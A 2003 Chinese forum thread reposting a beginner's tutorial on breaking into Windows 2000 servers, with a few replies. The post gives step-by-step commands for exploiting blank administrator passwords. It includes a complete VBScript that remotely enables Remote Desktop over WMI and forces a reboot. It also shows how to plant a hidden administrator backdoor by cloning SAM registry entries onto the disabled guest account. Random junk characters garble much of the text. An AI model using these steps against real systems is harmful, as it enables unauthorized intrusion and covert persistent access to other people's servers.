设为首页收藏本站
开启辅助访问

下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

 下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
下沙论坛»下沙论坛 ╃摩登&时代╃ 科技.电脑网络 一次简单的3389入侵
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
返回列表 发新帖
查看: 3689|回复: 4
打印 上一主题 下一主题

一次简单的3389入侵

[复制链接]
firelinux

该用户从未签到
跳转到指定楼层
1
发表于 2003-3-17 15:34:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一次简单的3389入侵过程 - t# d7 d7 p+ [# H4 P! s原创:caozhe(草哲) ) } Z, d2 `6 ` x5 v( q8 T- e0 Q) l来源:中国欲网技术论坛--草哲 : ]! ^( M6 W( d: z V5 _, S 7 Q w# b$ K+ k. J# P6 {我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!% o/ H5 u5 N2 ^ : C$ k [% g1 ]1 ~0 E8 x/ } 于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~! $ p% h2 P3 L1 B8 F, m要入侵,我建议你在win2000环境下来*作! . c0 [ F* J, f# ?: }" |, @2 x* Z0 W0 ?4 g& y 首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!/ b% J4 g, c" e! } 扫描的X-Scan V2.3、WINNTAutoAttack、流光! 0 C" J) r% ?3 |% t! lX-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!! m& x9 n: z* }* K* @* j 远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)" y8 y9 q. Q+ a$ k6 j 克隆帐户用个psu就可以了~! ; [3 }% R3 Y- \' p8 r# h" u2 y. A" ^# I. K% X: z OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空* f3 m& c5 l" s& C4 F4 W5 y 运行CMD(2000下的DOS),我们给它开终端!5 h7 w3 D, U- D0 ^% [9 P 命令如下! ! w% o' [, z8 l" k/ q/ O$ Icscript rots.vbe 120.0.0.1 administrator "" 3389 /fr 0 \4 |& [2 s$ J( ?- N上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)7 O: J9 Q4 d- g + t& }% P G" x" o* \# ~0 V9 l 因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!' X/ ~4 [: C& l& D9 |. o " Q: O! t1 l/ Z' }* n& l) q$ l一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t* u! M; A! ?. w* e2 R. ~ 安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛! 4 y W5 y( A! ^0 N' H" \* F3 t1 f, q. r. n 回到DOS下!我们建立IPC$连接!2 [4 _2 q1 @" X, @2 L net use \\120.0.0.1\ipc$ "" /user:"administrator" 8 L$ r( X4 q% A4 q这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!% q2 C/ Y* D. A# r copy psu.exe \\120.0.0.1\admin$\system32# ~8 p% P$ g+ e( Y, J6 X- W 上传完毕后,开始在肉鸡做后门帐户!看肉鸡! : R c5 y3 I5 e/ h) o 6 B6 j7 s( D! z1 B假设guest用户被禁用,我们就是要利用guest做后门帐户!4 P$ I' Y5 Y/ ?; c" b2 O 在该服务器运行CMD,在命令行下输入 * @' p9 A$ l, b8 U+ bpsu -p regedit -i PID $ ^2 `( I- ~3 v; ^3 |; j- T5 O2 [% |1 n( b% r 这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器! 4 S$ N- v* J% v& @看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458 4 @8 L2 o% x; N) T: l5 Z" Q那么,命令就是这样4 R" \/ S: _. L* c psu -p regedit -i 54580 N& ~4 f& p, o N) X 这样直接打开注册表,可以读取本地sam的信息。 1 C2 {- ]- r7 {打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users& w6 D! g$ S% |! @. M 下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户! . G: h9 S( {3 d* S% c' xHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 1 q) I H7 B& E- x" P% Q# D6 m查看administrator的类型,是if4,再看guest的是if5# W: f0 T! y( ~/ S5 x% g7 [3 e 好了,知道了类型后,打开- w6 O% G4 ?' S' l' W) Y HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 ; W8 {& ~. L8 h' L这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开- x5 w/ h, `% {- [" J- W HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5; `9 [" z0 l0 ?5 C- Q 双击右侧的F,把刚复制的粘贴到里面!7 J- r0 d7 r9 Q* T : D3 k5 K5 ^' _' y1 a+ X3 ~* s做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F58 q- w$ ?& A( o* [( } 和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest . `0 p! g) t$ R" X4 F这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。 5 [4 }+ b! Y# h u ) f `0 u* Q( p% c# n打开CMD,在命令行下输入( F, V" ]* c2 u0 c; ] net user guest password ; L& `+ q" L) R) A9 I! j这条命令是给guest设置密码,后面的password就是密码- d" O. v3 I0 L' C 然后输入 / P! j5 ~' q9 c" _3 Lnet user guest /active:y 9 e" |+ U8 q. t" }6 u这命令是激活guest帐户,然后我们把他禁用7 L: O+ H+ P1 q1 z; |, T0 q1 \) q net user guest /active:n: O% `: t& j( ^8 g2 i 上面的三行命令必须在DOS下执行!1 m9 c6 I: H; |, V* s' j1 d7 t$ r ? F* Y5 g' G/ S- TOK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了! " M+ Z; L4 s9 v# y而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的! 3 G% l. ]) X) ~: K: h $ e9 c$ x. ]) g3 `; m8 H7 T注销一下,用guest登陆吧!# o1 A1 \( U3 o+ ]8 @% | 0 B; g+ a# ~1 G打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊! 8 e7 z! y# |# W2 e如果还有地方不明白的话,可以问我,我知道的一定告诉大家!( r& E0 q0 {3 _, s ' W2 p; L. ?; ?因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~! " O# N% S3 V+ P6 ?- Q8 b! `4 F( a* ]( b) B. r7 X ----------------------------------------------------------------------" E b& x( | D3 c- e+ i0 e* g$ q 以下是开终端的脚本,把它存为*.vbe5 O! ]/ O& q, Q$ c0 f on error resume next 4 c9 Y' t3 L' nset outstreem=wscript.stdout - q: W" z o! k, c: {5 W$ O) O9 Bset instreem=wscript.stdin7 u2 Y9 h8 O% T* C# ^4 u if (lcase(right(wscript.fullname,11))="wscript.exe") then / z1 w6 F4 S- @; R2 ^% n set objShell=wscript.createObject("wscript.shell") b8 J4 T" q0 v( N" }+ G objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) 6 E: Z! z, c; ]7 ?, m' V wscript.quit2 J4 i- Z7 e6 R+ h1 f8 N end if. s+ H/ I/ Q( j7 n/ J/ X% z if wscript.arguments.count<3 then( W4 A' R; M& f9 R" m4 ^* ^ usage() " Q# p7 \5 m1 K: ~4 [) H, b wscript.echo "Not enough parameters." 3 Z; j z/ Y: j0 @& z# R& J' U wscript.quit. b0 @! L6 G& O e/ B end if 6 b) w( R. ?6 z- S ' \& r2 M* s7 z7 _8 Pipaddress=wscript.arguments(0); e/ E& Y" b0 M5 H3 f; b: y8 O username=wscript.arguments(1)( p' b% s: x" _& I8 s* G" @2 c7 J8 j password=wscript.arguments(2) 5 z7 t% i/ r y- c2 ~1 b: a; `& Yif wscript.arguments.count>3 then2 I, {1 Y" P) q8 v+ ^! K port=wscript.arguments(3) + ~) k1 u ]& v9 r% r8 W$ celse8 ~3 N. m1 M9 X' r; g) F% i" x port=3389 8 x1 i+ g3 L" b6 n& hend if + U$ ?6 G1 G, }8 y4 _7 V8 x l P* G( Qif not isnumeric(port) or port<1 or port>65000 then - z; l& e$ ^* w- w! g% Q wscript.echo "The number of port is error." ) d0 }! p& b8 p# N/ k8 m8 M& {) x1 V wscript.quit" Q3 a) u+ v- Y6 f7 O& w end if 1 U8 B' I F$ ~* ^0 nif wscript.arguments.count>4 then / Z/ h1 ^2 H- _4 h reboot=wscript.arguments(4) # z( W9 `2 w0 ]) |4 Relse + v; h* h- Y- y+ u" G reboot="" % W. _( j6 a" D0 ?( j0 {end if 7 m1 @- O- n' x* ]) f: ]; H$ K4 Z3 H' l6 k& a2 H. s4 I7 u usage() A2 u0 {1 @0 H! Q4 P& w outstreem.write "Conneting "&ipaddress&" ...."+ Q/ ]# v2 Q" Y) c3 K$ ^/ u' f- [( m& [8 } set objlocator=createobject("wbemscripting.swbemlocator") 1 z# ]0 K, T3 t* L* L$ y# tset objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)- J- L$ I& j, k$ A! N' z3 t5 S showerror(err.number)* ?# J7 D; c9 O$ Q2 o7 i& `7 [1 S objswbemservices.security_.privileges.add 23,true; |% _, {8 H1 H) F objswbemservices.security_.privileges.add 18,true! k, ~, v" H+ k3 q " H+ H8 N5 E$ b' _; s outstreem.write "Checking OS type...." [6 _: o& A$ V% {set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem") ( c. \! h' ?( J. ?% d& t' P+ P( |for each objinstoscaption in colinstoscaption : u0 H0 K5 C7 R3 B' V7 k if instr(objinstoscaption.caption,"Server")>0 then 0 `- h1 p* R$ J; T7 F wscript.echo "OK!"8 ] U: Z0 ] U% I else x$ A: P6 e& k* | wscript.echo "OS type is "&objinstoscaption.caption, ` R7 E1 `) g, l: D9 j outstreem.write "Do you want to cancel setup?[y/n]"1 s3 y1 s" p- W% v5 H- h& k strcancel=instreem.readline" a4 d/ t3 | l* h4 T7 S+ T if lcase(strcancel)<>"n" then wscript.quit 6 z, \! y2 C7 q- Z. v3 K0 J end if 7 j4 Y. I1 j: f) K0 U+ x* x# dnext " l& v( ~, q! Q* a% ] \/ r 2 r. W( P8 j& n+ b Voutstreem.write "Writing into registry ...."( t- v5 H8 P5 W/ F* U set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")1 t2 F$ z! T" s; \ HKLM=&h80000002; i4 G* j) x. z* A9 H2 e HKU=&h80000003) J; g0 F# R+ U. L with objinstreg 1 p' n2 K' F/ X5 O' J6 q% R% }.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" / J0 ^% }' B9 ?; w [9 o6 b.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 0 H# k% G; i3 |2 S6 X" T, E.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"3 k/ X. s: I' k7 }9 C7 E .setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 ( Z6 F$ D! ]% d" v* Y# O5 O.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1* |0 u2 S( F0 ^6 } .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2# r; \, W) c* w, |# U .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",26 a. I. i) O: X+ l, w) E I* R .setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"8 z3 z+ K( }+ L4 {: E F6 ?6 m .setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port - f: z- R. C, m- s$ \end with B' U x# ^( p, V) a% D3 lshowerror(err.number) & n' Y9 b+ h3 X9 }, w6 n( V+ n4 C1 M 3 Q" E* f# X9 L+ Zrebt=lcase(reboot) , Q9 u* Q- H! I) J& `3 m+ Mflag=0 0 m- `4 C4 s, L" c+ x b& ^! }if rebt="/r" or rebt="-r" or rebt="\r" then flag=2- R6 r$ C: [3 Z9 d# Q& x5 Y1 [ if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6 # Z% o0 C$ p/ |. \if flag<>0 then; h9 `' N) ^3 P2 ~1 s) k: M outstreem.write "Now, reboot target...." 1 h# ^/ D* T" ]- C M: L strwqlquery="select * from win32_operatingsystem where primary='true'" 7 p% o4 Y& [6 [+ H5 S2 J x6 r set colinstances=objswbemservices.execquery(strwqlquery) ' P' t0 J* G, w" c+ \% D" a( Y for each objinstance in colinstances5 O" u& l. w4 U. J' y objinstance.win32shutdown(flag) $ b) j% Y) `: ^& g5 X next $ x" F: z+ F+ T9 R3 S0 M, r showerror(err.number) v" z! `9 q* A) c8 {else ) i; @: I5 J: _* {$ S6 }" ^ wscript.echo "You need to reboot target."&vbcrlf&"Then," " w% [/ Z N, p4 f1 _0 ^+ uend if) U6 b+ d" p& b( L wscript.echo "You can logon terminal services on "&port&" later. Good luck!" 4 Y+ I. P4 G! K. f/ O+ ]. Z0 }" I8 Z" M' r. D0 v! D. C function showerror(errornumber) . I& ?( S9 u$ F. m( Iif errornumber Then7 T; W* {: r/ q6 L wscript.echo "Error 0x"&cstr(hex(err.number))&" ." 1 R: |6 J9 T( u2 V: l if err.description <> "" then & Z5 n' }7 u# B wscript.echo "Error description: "&err.description&"." 7 w/ }0 X- n9 Z j4 } end if) w$ O+ k# z4 ?3 k F wscript.quit 2 l4 R- k' Q; |" Relse 6 n6 p8 u6 h6 r, I5 V" J1 @( v- L- j! K wscript.echo "OK!"& ]! r/ a% I3 W( e3 x1 h end if \4 q# J$ j# l4 w2 X end function& V( U5 M% P# V% W3 {. k / ~- `6 H* F S9 ] h( d- |+ K function usage()/ L" C2 S; C+ I4 J' e @ wscript.echo string(79,"*") - q5 ?* c0 w* Q \) qwscript.echo "ROTS v1.05" 0 h& X/ _2 r; ^. W: @/ X/ vwscript.echo "Remote Open Terminal services Script, by 草哲"* Y' [. z$ p7 J; i wscript.echo "Welcome to visite www.5458.net" & g2 H. F* A7 owscript.echo "Usage:" ) u6 u- r# V6 z$ p# p0 W* Owscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]": B/ L1 C# x! k5 y2 E wscript.echo "port: default number is 3389." ! @0 g4 ?5 T% `2 vwscript.echo "/r: auto reboot target." $ W4 F, U. s# W+ n$ H$ pwscript.echo "/fr: auto force reboot target."5 g+ p1 m# ^2 j: |" m wscript.echo string(79,"*")&vbcrlf / ?3 Z$ f$ U4 y( u" t" E; \end function , G4 q2 ?0 y! V) `/ p% e: p) f : K5 ?; y# t1 e# t 转自安全焦点
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩
回复

使用道具 举报

安哲有德 该用户已被删除
2
发表于 2003-3-20 00:24:00 | 只看该作者
这么好的东西好象没有人看,是不感兴趣吗?8 h0 ^4 l) _! D/ R) q7 [( Y
还是什么的,看来我们工程学院还真有很多不错的角色哦!
回复 支持 反对

使用道具 举报

安哲有德 该用户已被删除
3
发表于 2003-3-20 00:28:00 | 只看该作者
不过你还是说得简单点吧,估计那样的话会有多一点的人看的
2 X3 ?/ S  s" x1 {5 s
, T' ^7 G* G  r2 c* H
回复 支持 反对

使用道具 举报

安哲有德 该用户已被删除
4
发表于 2003-3-20 00:30:00 | 只看该作者
' j& ~  }" q# a/ {4 U! [" Z+ \
# V4 U& e8 H0 |( h1 I

6 I4 T- P; i- f, i1 ~- r
% L3 s5 @& M; w5 r7 Z
, @1 K; a' _+ H
[此贴子已经被作者于2003-3-24 21:15:45编辑过]

4 f, L6 S1 f4 r$ J8 W
回复 支持 反对

使用道具 举报

丧心病狂 该用户已被删除
5
发表于 2003-3-20 14:00:00 | 只看该作者
这个类似的我看多了,3389的漏洞好像都在一夜间成名,然后一夜间被人疯狂堵上。
回复 支持 反对

使用道具 举报

返回列表 发新帖

本版积分规则

关闭

下沙大学生网推荐上一条 /1 下一条

快速回复 返回顶部 返回列表